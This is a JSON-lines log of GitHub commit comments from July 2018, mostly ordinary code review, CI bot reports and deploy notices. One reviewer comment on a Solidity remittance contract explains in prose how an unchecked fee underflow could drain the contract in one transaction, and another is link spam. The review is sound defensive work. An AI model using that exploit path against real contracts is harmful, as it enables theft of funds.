{"id":"7955416642","type":"CommitCommentEvent","actor":{"login":"brusoman"},"repo":{"name":"brusoman/Angular-components"},"payload":{"comment":{"id":29683357,"position":21,"line":20,"path":"src/app/components/growl/growl.component.ts","commit_id":"158b5f586b724bc531241f0f5dc57ea2592a7582","created_at":"2018-07-12T10:40:33Z","updated_at":"2018-07-12T10:40:33Z","author_association":"OWNER","body":"Может тут и цвет будем менять? Я не вижу смысла отдельно класс изменять из-за цвета другого. "}},"created_at":"2018-07-12T10:40:33Z"}
{"id":"7955416690","type":"CommitCommentEvent","actor":{"login":"ksrr0215"},"repo":{"name":"ksrr0215/new"},"payload":{"comment":{"id":29683358,"position":null,"line":null,"path":null,"commit_id":"46af09e826bc7742ca2d7b31f52ed1bd9cc30d61","created_at":"2018-07-12T10:40:33Z","updated_at":"2018-07-12T10:40:33Z","author_association":"OWNER","body":"all the best"}},"created_at":"2018-07-12T10:40:33Z"}
{"id":"7955416950","type":"CommitCommentEvent","actor":{"login":"dubhater"},"repo":{"name":"HomeOfVapourSynthEvolution/havsfunc"},"payload":{"comment":{"id":29683359,"position":null,"line":null,"path":null,"commit_id":"d58d68134934dfc49153116c4edc1ab46e333877","created_at":"2018-07-12T10:40:36Z","updated_at":"2018-07-12T10:40:36Z","author_association":"NONE","body":"Could I have the code that used to live at https://github.com/HomeOfVapourSynthEvolution/VapourSynth-DePan, please?"}},"created_at":"2018-07-12T10:40:36Z"}
{"id":"7955417385","type":"CommitCommentEvent","actor":{"login":"cenka"},"repo":{"name":"cenakas/First-Python-programs"},"payload":{"comment":{"id":29683360,"position":4,"line":4,"path":"James_Bond.py","commit_id":"659269032c3504e5d9e5418067e483946c9d352d","created_at":"2018-07-12T10:40:42Z","updated_at":"2018-07-12T10:40:42Z","author_association":"COLLABORATOR","body":"open(filename, 'r+') - otwieramy do odczytu i zapisu"}},"created_at":"2018-07-12T10:40:42Z"}
{"id":"7955420333","type":"CommitCommentEvent","actor":{"login":"LinusU"},"repo":{"name":"Microsoft/TSJS-lib-generator"},"payload":{"comment":{"id":29683365,"position":53,"line":903,"path":"src/emitter.ts","commit_id":"e29b2ec8fac090be53d72caf84b05fe40793fe87","created_at":"2018-07-12T10:41:21Z","updated_at":"2018-07-12T10:41:21Z","author_association":"NONE","body":"Didn't do it since the semantics felt \"wrong\". It felt like `printLine(\" {\")` had the intention of putting ` {` on it's own line.\r\n\r\nHappy to change if you want to though!"}},"created_at":"2018-07-12T10:41:21Z"}
{"id":"7955420568","type":"CommitCommentEvent","actor":{"login":"JanTvrdik"},"repo":{"name":"nette/security"},"payload":{"comment":{"id":29683366,"position":null,"line":null,"path":null,"commit_id":"bc0f81d34099f8ba4fb4f0d1d260c1e39d80976e","created_at":"2018-07-12T10:41:23Z","updated_at":"2018-07-12T10:41:23Z","author_association":"CONTRIBUTOR","body":"Basically as far as I understand it, `PASSWORD_DEFAULT` will work well only if you remove support for passing custom `$options`."}},"created_at":"2018-07-12T10:41:23Z"}
{"id":"7955422043","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29683372,"position":null,"line":null,"path":null,"commit_id":"8cb8b17ec0ebb62ad29c9c0e51e510cde90923b8","created_at":"2018-07-12T10:41:43Z","updated_at":"2018-07-12T10:41:43Z","author_association":"NONE","body":"GopherCI found **12** issues in the last **2** commits, see: https://gci.gopherci.io/analysis/1573"}},"created_at":"2018-07-12T10:41:43Z"}
{"id":"7955422469","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29683373,"position":70,"line":74,"path":"contracts/Remittance.sol","commit_id":"0d6c0cff0432c8ae16e0c571fc6790616457e5d4","created_at":"2018-07-12T10:41:49Z","updated_at":"2018-07-12T10:41:49Z","author_association":"NONE","body":"I see this restriction as artificial. You see, your intent is that, whether the payment was processed, or the payment was claimed back, the fee will anyway be paid. So why wait for something to happen before it can be claimed?\r\nI think you should have the fee and the paid out amount be calculated at the beginning. No subtraction when it is time to pay."}},"created_at":"2018-07-12T10:41:49Z"}
{"id":"7955426780","type":"CommitCommentEvent","actor":{"login":"BliNeR-KeY"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":29683387,"position":null,"line":null,"path":null,"commit_id":"226d1cd9258d7386fc7d20dff3a81f21a6526b99","created_at":"2018-07-12T10:42:48Z","updated_at":"2018-07-12T10:42:48Z","author_association":"NONE","body":"Nice work thanks @atvcapitan"}},"created_at":"2018-07-12T10:42:48Z"}
{"id":"7955427851","type":"CommitCommentEvent","actor":{"login":"MikelVocesPorteiro"},"repo":{"name":"MikelVocesPorteiro/ShuLuca"},"payload":{"comment":{"id":29683390,"position":null,"line":null,"path":null,"commit_id":"f872a41f9cb9037da6e80ae30fe57b16748b3b02","created_at":"2018-07-12T10:43:03Z","updated_at":"2018-07-12T10:43:03Z","author_association":"OWNER","body":"gvghv"}},"created_at":"2018-07-12T10:43:03Z"}
{"id":"7955428841","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29683391,"position":null,"line":null,"path":null,"commit_id":"5cf9b2c72a73603cc7ecbecdda539c8df03142e4","created_at":"2018-07-12T10:43:16Z","updated_at":"2018-07-12T10:43:16Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (rraustad) - i386-Windows-7-VisualStudio-14: OK (2933 of 2933 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T10:43:16Z"}
{"id":"7955430810","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29683396,"position":66,"line":70,"path":"contracts/Remittance.sol","commit_id":"0d6c0cff0432c8ae16e0c571fc6790616457e5d4","created_at":"2018-07-12T10:43:40Z","updated_at":"2018-07-12T10:43:40Z","author_association":"NONE","body":"At no point did you check that `fee <= amount`. If this contract had other people's money it would be a huge risk. I would craft a `createPayment` transaction with a normal `amount` and a huge `fee`, such that `amount - fee` wraps around and gives me a number that is higher than `amount` and that is, \"magically\" equal to `this.balance`. \r\nEmptying the contract in 1 transaction."}},"created_at":"2018-07-12T10:43:40Z"}
{"id":"7955431304","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29683398,"position":null,"line":null,"path":null,"commit_id":"37520993a823857b9ef29c0a321a9ff5ebd6b3f1","created_at":"2018-07-12T10:43:47Z","updated_at":"2018-07-12T10:43:47Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-104345 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-104345\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T10:43:47Z"}
{"id":"7955432866","type":"CommitCommentEvent","actor":{"login":"mymaizi"},"repo":{"name":"beraybentesen/glide-xamarin-android"},"payload":{"comment":{"id":29683402,"position":null,"line":null,"path":null,"commit_id":"ec5c6d4a0b8a12b680d8cd2a2d786fb6ff2a8bb0","created_at":"2018-07-12T10:44:09Z","updated_at":"2018-07-12T10:44:09Z","author_association":"NONE","body":"Waiting for update 4.7.1"}},"created_at":"2018-07-12T10:44:09Z"}
{"id":"7955434414","type":"CommitCommentEvent","actor":{"login":"ccw808"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29683405,"position":null,"line":null,"path":null,"commit_id":"93625a226154438d5d3cca612dbe088264481e61","created_at":"2018-07-12T10:44:29Z","updated_at":"2018-07-12T10:44:29Z","author_association":"MEMBER","body":"Reverting this as it's in the release build"}},"created_at":"2018-07-12T10:44:29Z"}
{"id":"7955437061","type":"CommitCommentEvent","actor":{"login":"UNHNQ"},"repo":{"name":"pingcap/blog-cn"},"payload":{"comment":{"id":29683413,"position":null,"line":null,"path":null,"commit_id":"2a42cdfb67e4a257bc1dc9736a846be74f7d8466","created_at":"2018-07-12T10:45:03Z","updated_at":"2018-07-12T10:45:03Z","author_association":"CONTRIBUTOR","body":"LGTM"}},"created_at":"2018-07-12T10:45:03Z"}
{"id":"7955441320","type":"CommitCommentEvent","actor":{"login":"alekseisasin"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":29683418,"position":11,"line":83,"path":"UM/Qt/Bindings/MainWindow.py","commit_id":"c20418405f6c10588b456e9b72e5e3999c7f7a35","created_at":"2018-07-12T10:45:55Z","updated_at":"2018-07-12T10:45:55Z","author_association":"CONTRIBUTOR","body":"It was introduced only to prevent windows closing if it prints something. For this reason, I used \"might\" But some other plugin can also subscribe to this signal. \r\nI will check it. Lipu wants to adjust in this commit, I do not yet what exactly. I will keep in mind your comment."}},"created_at":"2018-07-12T10:45:55Z"}
{"id":"7955445481","type":"CommitCommentEvent","actor":{"login":"dbaik"},"repo":{"name":"backmeupplz/fondu"},"payload":{"comment":{"id":29683423,"position":154,"line":154,"path":"style-ru.css","commit_id":"98d485cff518dc15ae9b270f0c1ce9d6789a1712","created_at":"2018-07-12T10:46:51Z","updated_at":"2018-07-12T10:46:51Z","author_association":"NONE","body":"Для чего тут левый марджин на картинки?"}},"created_at":"2018-07-12T10:46:51Z"}
{"id":"7955447890","type":"CommitCommentEvent","actor":{"login":"hocus2pocus"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29683427,"position":21,"line":68,"path":"ruby_module_9/interface_train.rb","commit_id":"0adcc520c6960e18b8fbba1bb93ea0b1fb3a7400","created_at":"2018-07-12T10:47:25Z","updated_at":"2018-07-12T10:47:25Z","author_association":"OWNER","body":"Вопрос был про то, нужно ли здесь присваивать блок переменной.\r\nНо я сам уже вижу, что не нужно. =)"}},"created_at":"2018-07-12T10:47:25Z"}
{"id":"7955448710","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtBeppu/introPython3_beppu"},"payload":{"comment":{"id":29683429,"position":21,"line":21,"path":"e09/e09_05.py","commit_id":"7c82b500d2542a1b6b2c1aa67ebcf70b2f8f74f9","created_at":"2018-07-12T10:47:35Z","updated_at":"2018-07-12T10:47:35Z","author_association":"COLLABORATOR","body":"山本　指摘\r\nコメントについて、「○○を定義」「要求を送信」はコードの内容がそのまま書いてあるだけなので、\r\n「なんのために」や「なにをやりたいか」が記載されていません。\r\nこの場合ですと、pythonにgetとして渡されたものをwebの画面に渡す、という要件になるので\r\nその要件に沿ったコメントを意識してください。"}},"created_at":"2018-07-12T10:47:35Z"}
{"id":"7955453250","type":"CommitCommentEvent","actor":{"login":"cenka"},"repo":{"name":"cenakas/First-Python-programs"},"payload":{"comment":{"id":29683435,"position":14,"line":14,"path":"James_Bond.py","commit_id":"659269032c3504e5d9e5418067e483946c9d352d","created_at":"2018-07-12T10:48:37Z","updated_at":"2018-07-12T10:48:37Z","author_association":"COLLABORATOR","body":"exit()"}},"created_at":"2018-07-12T10:48:37Z"}
{"id":"7955453668","type":"CommitCommentEvent","actor":{"login":"seoyeongsong"},"repo":{"name":"seoyeongsong/TIL"},"payload":{"comment":{"id":29683438,"position":null,"line":null,"path":null,"commit_id":"00b44ed35ea677eeb7657892bb4d9d74c90eebd6","created_at":"2018-07-12T10:48:42Z","updated_at":"2018-07-12T10:48:42Z","author_association":"OWNER","body":"https://github.com/seoyeongsong/TIL/issues/2"}},"created_at":"2018-07-12T10:48:42Z"}
{"id":"7955456979","type":"CommitCommentEvent","actor":{"login":"baluragala"},"repo":{"name":"zeolearn/nodejs-text-tutorial"},"payload":{"comment":{"id":29683444,"position":41,"line":41,"path":"module1.md","commit_id":"b2d5ed1da466a52d893e1357ee581713de978b09","created_at":"2018-07-12T10:49:26Z","updated_at":"2018-07-12T10:49:26Z","author_association":"COLLABORATOR","body":"Could you please help with rough hand drawing of the fast food joint story?, I will get a creative designed with my team"}},"created_at":"2018-07-12T10:49:26Z"}
{"id":"7955457377","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29683447,"position":null,"line":null,"path":null,"commit_id":"615f6e98055ef5e50f70e33091daeb5111c75799","created_at":"2018-07-12T10:49:30Z","updated_at":"2018-07-12T10:49:30Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-104928 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-104928\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T10:49:30Z"}
{"id":"7955472477","type":"CommitCommentEvent","actor":{"login":"danielehrhardt"},"repo":{"name":"maximegris/angular-electron"},"payload":{"comment":{"id":29683477,"position":null,"line":null,"path":null,"commit_id":"63a41b8450c41ca5129b76e0bc27ce470d94ff80","created_at":"2018-07-12T10:52:43Z","updated_at":"2018-07-12T10:52:43Z","author_association":"NONE","body":"Why did you make this change?"}},"created_at":"2018-07-12T10:52:43Z"}
{"id":"7955472815","type":"CommitCommentEvent","actor":{"login":"baluragala"},"repo":{"name":"zeolearn/nodejs-text-tutorial"},"payload":{"comment":{"id":29683478,"position":56,"line":56,"path":"module1.md","commit_id":"b2d5ed1da466a52d893e1357ee581713de978b09","created_at":"2018-07-12T10:52:47Z","updated_at":"2018-07-12T10:52:47Z","author_association":"COLLABORATOR","body":"Can we use repl.it for example codes? This gives users an opportunity to play with. Check https://repl.it/site/docs/embed for embedding the same. Let me know if any challenges"}},"created_at":"2018-07-12T10:52:47Z"}
{"id":"7955476751","type":"CommitCommentEvent","actor":{"login":"baluragala"},"repo":{"name":"zeolearn/nodejs-text-tutorial"},"payload":{"comment":{"id":29683494,"position":5,"line":5,"path":"module2.md","commit_id":"b2d5ed1da466a52d893e1357ee581713de978b09","created_at":"2018-07-12T10:53:40Z","updated_at":"2018-07-12T10:53:40Z","author_association":"COLLABORATOR","body":"Type in heading"}},"created_at":"2018-07-12T10:53:40Z"}
{"id":"7955479218","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29683505,"position":null,"line":null,"path":null,"commit_id":"48aaf870eed0fb29f605830a1c4780157a193770","created_at":"2018-07-12T10:54:13Z","updated_at":"2018-07-12T10:54:13Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-105412 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-105412\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T10:54:13Z"}
{"id":"7955483699","type":"CommitCommentEvent","actor":{"login":"jpountz"},"repo":{"name":"nknize/lucene-solr"},"payload":{"comment":{"id":29683515,"position":55,"line":55,"path":"lucene/sandbox/src/java/org/apache/lucene/document/LatLonPolygon.java","commit_id":"db47b7490243043b2581a071fe3efe63c7d393c3","created_at":"2018-07-12T10:55:13Z","updated_at":"2018-07-12T10:55:13Z","author_association":"NONE","body":"I'm wondering whether it would make a better API if we replaced this class with the TriangleField that you use under the hood and then had factory methods for polygons, lines, ellipses, etc. That would help avoid creating a new class for each shape?"}},"created_at":"2018-07-12T10:55:13Z"}
{"id":"7955487131","type":"CommitCommentEvent","actor":{"login":"baluragala"},"repo":{"name":"zeolearn/nodejs-text-tutorial"},"payload":{"comment":{"id":29683521,"position":14,"line":14,"path":"module2.md","commit_id":"b2d5ed1da466a52d893e1357ee581713de978b09","created_at":"2018-07-12T10:55:57Z","updated_at":"2018-07-12T10:55:57Z","author_association":"COLLABORATOR","body":"It will be good if require function and exports objects are explained in detail before explaining the usage different kinds of modules."}},"created_at":"2018-07-12T10:55:57Z"}
{"id":"7955489972","type":"CommitCommentEvent","actor":{"login":"william-gooch"},"repo":{"name":"Scholar-6/learning-fortress-frontend"},"payload":{"comment":{"id":29683522,"position":null,"line":null,"path":null,"commit_id":"c1b24b472170bded900289abeb7910a221a3d9fa","created_at":"2018-07-12T10:56:36Z","updated_at":"2018-07-12T10:56:36Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [BRICK QUESTION TYPE Iii Select Multile answers in MChoice](https://trello.com/c/NWgHq9ds/21-brick-question-type-iii-select-multile-answers-in-mchoice)"}},"created_at":"2018-07-12T10:56:36Z"}
{"id":"7955491011","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"fujita0622/-WriteTypeSqlDrill"},"payload":{"comment":{"id":29683524,"position":23,"line":23,"path":"cap2/2_6_2.sql","commit_id":"b82d4d5acc3b8882d45dbe42675a6ab1e00de176","created_at":"2018-07-12T10:56:50Z","updated_at":"2018-07-12T10:56:50Z","author_association":"COLLABORATOR","body":"山本　補足\r\nテキストの解答なのでしょうがないが、取得カラム名が「?」になっている。\r\n上記について、確認済みであれば、問題ないですが、意識できていないようでしたら、\r\n動作確認をもっと行うように意識してみてください。"}},"created_at":"2018-07-12T10:56:50Z"}
{"id":"7955497997","type":"CommitCommentEvent","actor":{"login":"peterkohautarm"},"repo":{"name":"peterkohautarm/Vulkan-ValidationLayers"},"payload":{"comment":{"id":29683536,"position":60,"line":6808,"path":"layers/core_validation.cpp","commit_id":"a0392c31cef4ed4f04c130095c245cb831b9657e","created_at":"2018-07-12T10:58:26Z","updated_at":"2018-07-12T10:58:26Z","author_association":"OWNER","body":"nope, clang-format did it"}},"created_at":"2018-07-12T10:58:26Z"}
{"id":"7955499045","type":"CommitCommentEvent","actor":{"login":"tvdijen"},"repo":{"name":"simplesamlphp/simplesamlphp"},"payload":{"comment":{"id":29683540,"position":null,"line":null,"path":null,"commit_id":"540f2c971460d7c91ee95ddfc98fdfbd31183125","created_at":"2018-07-12T10:58:40Z","updated_at":"2018-07-12T10:58:40Z","author_association":"MEMBER","body":"Haven't found any!"}},"created_at":"2018-07-12T10:58:40Z"}
{"id":"7955505504","type":"CommitCommentEvent","actor":{"login":"baluragala"},"repo":{"name":"zeolearn/nodejs-text-tutorial"},"payload":{"comment":{"id":29683551,"position":3,"line":3,"path":"module3.md","commit_id":"b66f6ea208b8384a0482445007452f4d7250bebb","created_at":"2018-07-12T11:00:05Z","updated_at":"2018-07-12T11:00:05Z","author_association":"COLLABORATOR","body":"Please re-phrase this whole \"+Traditionally, in Nodejs, to process a data in the form of a file by reading and writing consumes a lot more memory since this processing methods needs to load the file every time it has to read or write that file. This is considered as a waste of resources. Node.js asynchronous nature provides two suitable options for us to work with. They are emitting events and streams. In this section, we will be taking a look into both of them.\" Events are available in node right from its initial versions, Can you try a different style of explanation that signifies the events and stream needs?"}},"created_at":"2018-07-12T11:00:05Z"}
{"id":"7955508003","type":"CommitCommentEvent","actor":{"login":"jhabdas"},"repo":{"name":"MattMattV/after-dark"},"payload":{"comment":{"id":29683558,"position":null,"line":null,"path":null,"commit_id":"19fa17bdb044830f31bfb7e0be2a025a37899d26","created_at":"2018-07-12T11:00:34Z","updated_at":"2018-07-12T11:00:34Z","author_association":"NONE","body":"> I don't know why fathom does not work on my Firefox\r\n\r\nOpen your console in Firefox and type `navigator.doNotTrack`. Then try it again in Chrome."}},"created_at":"2018-07-12T11:00:34Z"}
{"id":"7955511932","type":"CommitCommentEvent","actor":{"login":"dg"},"repo":{"name":"nette/security"},"payload":{"comment":{"id":29683566,"position":null,"line":null,"path":null,"commit_id":"bc0f81d34099f8ba4fb4f0d1d260c1e39d80976e","created_at":"2018-07-12T11:01:23Z","updated_at":"2018-07-12T11:01:23Z","author_association":"MEMBER","body":"I have plan to change it to an object. \r\n\r\nI'll get this out."}},"created_at":"2018-07-12T11:01:23Z"}
{"id":"7955512202","type":"CommitCommentEvent","actor":{"login":"JTXO"},"repo":{"name":"JTXO/cursogit"},"payload":{"comment":{"id":29683567,"position":1,"line":1,"path":"Readme.txt","commit_id":"4ddb550814c0340b21f3de8185a17f40476abfee","created_at":"2018-07-12T11:01:27Z","updated_at":"2018-07-12T11:01:27Z","author_association":"OWNER","body":"otro cambio "}},"created_at":"2018-07-12T11:01:27Z"}
{"id":"7955513581","type":"CommitCommentEvent","actor":{"login":"ravikmar"},"repo":{"name":"sleepblizzdm/sb"},"payload":{"comment":{"id":29683569,"position":null,"line":null,"path":null,"commit_id":"7d85fbe9a49b68a1acdf51d443793377419eb53e","created_at":"2018-07-12T11:01:45Z","updated_at":"2018-07-12T11:01:45Z","author_association":"NONE","body":"Nice if anyone looking Title insurance or title search can check out the link given  below\r\nhttps://titlerate.com/\r\nhttps://titlerate.com/title-insurance/"}},"created_at":"2018-07-12T11:01:45Z"}
{"id":"7955514367","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"fujita0622/-WriteTypeSqlDrill"},"payload":{"comment":{"id":29683571,"position":35,"line":35,"path":"cap2/2_6_3.sql","commit_id":"550560e9142dc1f7eb4167cda5691442f25817ff","created_at":"2018-07-12T11:01:57Z","updated_at":"2018-07-12T11:01:57Z","author_association":"COLLABORATOR","body":"山本　補足\r\nカラム名が「?」になっている。（2-6-2と同様の内容）"}},"created_at":"2018-07-12T11:01:57Z"}
{"id":"7955514581","type":"CommitCommentEvent","actor":{"login":"protonesso"},"repo":{"name":"JanusLinux/janus"},"payload":{"comment":{"id":29683572,"position":null,"line":null,"path":null,"commit_id":"1ea093fc86e5f96810bb857400733b63b4caa809","created_at":"2018-07-12T11:02:00Z","updated_at":"2018-07-12T11:02:00Z","author_association":"CONTRIBUTOR","body":"So syslinux works"}},"created_at":"2018-07-12T11:02:00Z"}
{"id":"7955515887","type":"CommitCommentEvent","actor":{"login":"SylvainCorlay"},"repo":{"name":"matplotlib/jupyter-matplotlib"},"payload":{"comment":{"id":29683575,"position":15,"line":15,"path":"ipympl/__init__.py.orig","commit_id":"157c97deddb2a76ae780bd26197fc13da00d4e13","created_at":"2018-07-12T11:02:16Z","updated_at":"2018-07-12T11:02:16Z","author_association":"MEMBER","body":"Good catch!"}},"created_at":"2018-07-12T11:02:16Z"}
{"id":"7955517872","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29683577,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"87bf1d21bcc509f21dbe8ad3d531fea91b0d9262","created_at":"2018-07-12T11:02:42Z","updated_at":"2018-07-12T11:02:42Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/command/urban (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/urban\" in any of:"}},"created_at":"2018-07-12T11:02:42Z"}
{"id":"7955517903","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29683578,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"87bf1d21bcc509f21dbe8ad3d531fea91b0d9262","created_at":"2018-07-12T11:02:43Z","updated_at":"2018-07-12T11:02:43Z","author_association":"NONE","body":"unconvert: could not import github.com/disiqueira/ultraslackbot/pkg/command/urban (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/urban\" in any of:"}},"created_at":"2018-07-12T11:02:43Z"}
{"id":"7955517925","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29683579,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"87bf1d21bcc509f21dbe8ad3d531fea91b0d9262","created_at":"2018-07-12T11:02:43Z","updated_at":"2018-07-12T11:02:43Z","author_association":"NONE","body":"go vet: cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/urban\" in any of:"}},"created_at":"2018-07-12T11:02:43Z"}
{"id":"7955517950","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29683580,"position":39,"line":null,"path":"pkg/command/urban/urban.go","commit_id":"87bf1d21bcc509f21dbe8ad3d531fea91b0d9262","created_at":"2018-07-12T11:02:43Z","updated_at":"2018-07-12T11:02:43Z","author_association":"NONE","body":"golint: exported function NewUrbanCommand should have comment or be unexported"}},"created_at":"2018-07-12T11:02:43Z"}
{"id":"7955518048","type":"CommitCommentEvent","actor":{"login":"tbrowder"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29683581,"position":null,"line":null,"path":null,"commit_id":"6064ab68aa4f093e5789eb26bf61439c04c8c038","created_at":"2018-07-12T11:02:44Z","updated_at":"2018-07-12T11:02:44Z","author_association":"CONTRIBUTOR","body":"Thanks, Luca!"}},"created_at":"2018-07-12T11:02:44Z"}
{"id":"7955519142","type":"CommitCommentEvent","actor":{"login":"jaimeperez"},"repo":{"name":"simplesamlphp/simplesamlphp"},"payload":{"comment":{"id":29683584,"position":null,"line":null,"path":null,"commit_id":"540f2c971460d7c91ee95ddfc98fdfbd31183125","created_at":"2018-07-12T11:02:59Z","updated_at":"2018-07-12T11:02:59Z","author_association":"MEMBER","body":"Wonderful! Thanks a lot! 😄 "}},"created_at":"2018-07-12T11:02:59Z"}
{"id":"7955522260","type":"CommitCommentEvent","actor":{"login":"jaimeperez"},"repo":{"name":"simplesamlphp/simplesamlphp"},"payload":{"comment":{"id":29683586,"position":null,"line":null,"path":null,"commit_id":"540f2c971460d7c91ee95ddfc98fdfbd31183125","created_at":"2018-07-12T11:03:41Z","updated_at":"2018-07-12T11:03:41Z","author_association":"MEMBER","body":"WRT the signature issue, it's already fixed in the SAML2 library (v3.2), and I'm working on a new RC2 right now..."}},"created_at":"2018-07-12T11:03:41Z"}
{"id":"7955524829","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"fujita0622/-WriteTypeSqlDrill"},"payload":{"comment":{"id":29683588,"position":20,"line":20,"path":"cap2/2_6_4.sql","commit_id":"bc9e34ef42cceb163a5148b25e6504a6fe216383","created_at":"2018-07-12T11:04:16Z","updated_at":"2018-07-12T11:04:16Z","author_association":"COLLABORATOR","body":"山本　指摘\r\n誤字指摘です\r\n「重複を含含んでしますので」\r\n\r\n"}},"created_at":"2018-07-12T11:04:16Z"}
{"id":"7955531411","type":"CommitCommentEvent","actor":{"login":"jhabdas"},"repo":{"name":"MattMattV/after-dark"},"payload":{"comment":{"id":29683613,"position":null,"line":null,"path":null,"commit_id":"19fa17bdb044830f31bfb7e0be2a025a37899d26","created_at":"2018-07-12T11:05:48Z","updated_at":"2018-07-12T11:05:48Z","author_association":"NONE","body":"WRT getting Fathom set-up it was dead-simple with Docker Compose using the default database, which means it'll be easy to wire up along with some other apps I'm already running on a Vultr VPS thanks to [Traefik](https://traefik.io). 😎"}},"created_at":"2018-07-12T11:05:48Z"}
